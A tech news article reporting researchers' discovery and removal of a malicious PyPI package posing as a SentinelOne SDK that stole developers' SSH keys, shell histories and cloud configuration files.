There’s another malicious PyPl package - this one stealing data from developers
Threat actors tried abusing a legitimate cybersecurity firm
When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.
Criminals have been found impersonating a well-known cybersecurity firm in an attempt to steal data from software developers, researchers have found.
Researchers from ReversingLabs recently discovered a maliciousPythonpackage on PyPI called “SentinelOne”. Named after a known cybersecurity company from the United States, the package pretends to be a legitimate SDK client allowing easy access to the SentinelOne API from within a separate project.
However, the package also carries “api.py” files which hold the malicious code, and allow the threat actors to exfiltrate sensitive data from the developers to a third-party IP address (54.254.189.27).
Going after auth tokens and API keys
The data being stolen includes Bash and Zsh histories, SSH keys, .gitconfig files, hosts files, AWS configuration info, Kube configuration info, and others. As per the publication, these folders usually store auth tokens, secrets, and API keys, which would enable threat actors further access to target cloud services and server endpoints.
The worst part is that the package does offer the functionality the developers expect. In reality, this is a hijacked package, meaning unsuspecting developers might end up using it and becoming victims in ignorance. The good news is that ReversingLabs confirmed the malicious intent of the package, and after reporting it to both SentinelOne and PyPI, had it removed from the repository.
These are the best endpoint protection tools right now>Malicious PyPi packages turn Discord into password-stealing malware>This random image is spreading a malicious PyPl package using GitHub
In the days and weeks leading up to the removal, the malicious actors were quite active. The package was first uploaded to PyPI on December 11, and has been updated 20 times in less than 10 days.
One of the issues that were fixed with an update was the inability to exfiltrate data from Linux systems, the researchers found.
Are you a pro? Subscribe to our newsletter
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
It’s difficult to say if anyone fell for the scam, the researchers concluded, as there is no evidence the package got used in an actual attack. Still, all the published versions were downloaded more than 1,000 times.
Via:BleepingComputer
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
This new malware utilizes a rare programming language to evade traditional detection methods
A new form of macOS malware is being used by devious North Korean hackers
Arcane season 2 confirms the hit series isn’t just one of the best Netflix shows ever made – it’s an animated legend that’ll stand the test of time
